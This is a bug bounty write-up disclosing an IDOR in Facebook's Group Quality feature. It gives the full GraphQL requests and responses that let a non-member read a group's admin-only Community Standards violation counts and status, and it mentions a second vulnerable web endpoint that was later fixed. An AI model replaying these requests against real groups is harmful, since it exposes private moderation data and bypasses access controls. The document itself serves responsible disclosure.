Group Quality Insights - Information of what/when/why Community standards are violated in a group (Includes False News).
Who can see this info - ONLY GROUP ADMINS (Mods excluded).
Couple of GraphQL calls giving some contextual responses to a non-member for a Closed and Public group -
Report - 1
Request goes to -
POST /graphql HTTP/1.1
Host: graph.facebook.com
doc_id=2942842929100492&variables={"params":{"path":"/groups/violations/queue/","params":"{\"group_id\":TARGET_GROUP_ID,\"policy\":\"community_standards\"}","nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"scale":"1"}
The response for this request will say -
"Admins in your group have posted or approved content that violates our Community Standards. If this continues, your group may be disabled."
Request to get False news violations -
POST /graphql HTTP/1.1
Host: graph.facebook.com
doc_id=2942842929100492&variables={"params":{"path":"/groups/violations/queue/","params":"{\"group_id\":TARGET_GROUP_ID,\"policy\":\"misinformation\"}","nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"88fac8953d888ebba949084724decfeb","pixel_ratio":1},"scale":"1"}
The response is -
"No Recent False News in Your Group" (I couldn't find how to make a false news post in a Group)
Report 2 -
Request body -
POST /graphql HTTP/1.1
doc_id=2424487570966507&method=post&locale=en_US&pretty=false&format=json&purpose=fetch&variables=%7B%22params%22%3A%7B%22path%22%3A%22%2Fgroups%2Fviolations%2Fdashboard%2F%22%2C%22params%22%3A%22%7B%5C%22group_id%5C%22%3A22TARGET_GROUP_ID%7D%22%2C%22nt_context%22%3A%7B%22using_white_navbar%22%3Atrue%2C%22styles_id%22%3A%2212a814e188c218e88139530938077622%22%2C%22pixel_ratio%22%3A1%7D%2C%22extra_client_data%22%3A%7B%7D%7D%2C%22nt_context%22%3A%7B%22using_white_navbar%22%3Atrue%2C%22styles_id%22%3A%2212a814e188c218e88139530938077622%22%2C%22pixel_ratio%22%3A1%7D%2C%22scale%22%3A%221%22%7D&fb_api_req_friendly_name=NativeTemplateScreenQuery&fb_api_caller_class=graphservice&fb_api_analytics_tags=%5B%22GraphServices%22%5D&server_timestamps=true
The response will be 200 OK and additional info which will show the count of "Community Standard Violations 19 violations"
Another request states the role who made the violations -
POST /api/graphql/ HTTP/1.1
Host: www.facebook.com
av=MY_USER_ID&__user=MY_USER_ID&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GroupsQualityCSViolationsRootContainerQuery&variables=%7B%22groupID%22%3A%22TARGET_GROUP_ID%22%7D&doc_id=2061462663959034
Contextual response -
If the Admins have broken Community standards -
"violations_queue_name": "Admin breaches have put your group at risk",
"violations_queue_subtitle": "Admins in your group have posted or approved content that violates our Community Standards. If this continues, your group may be disabled.",
"violations_queue_state": "ADMIN_VIOLATIONS"
},
"community_standard_violating_members": {
"count": 0,
If no Violations -
"violations_queue_name": "No breaches to show",
"violations_queue_subtitle": "If members of your group post content that breaches certain Community Standards, we'll tell you about it here.",
"violations_queue_state": "NO_VIOLATIONS"
},
"community_standard_violating_members": {
"count": 0,
After the fix of this issue, there was another endpoint going through web UI was vulnerable for IDOR. I updated the report to get it fixed as well.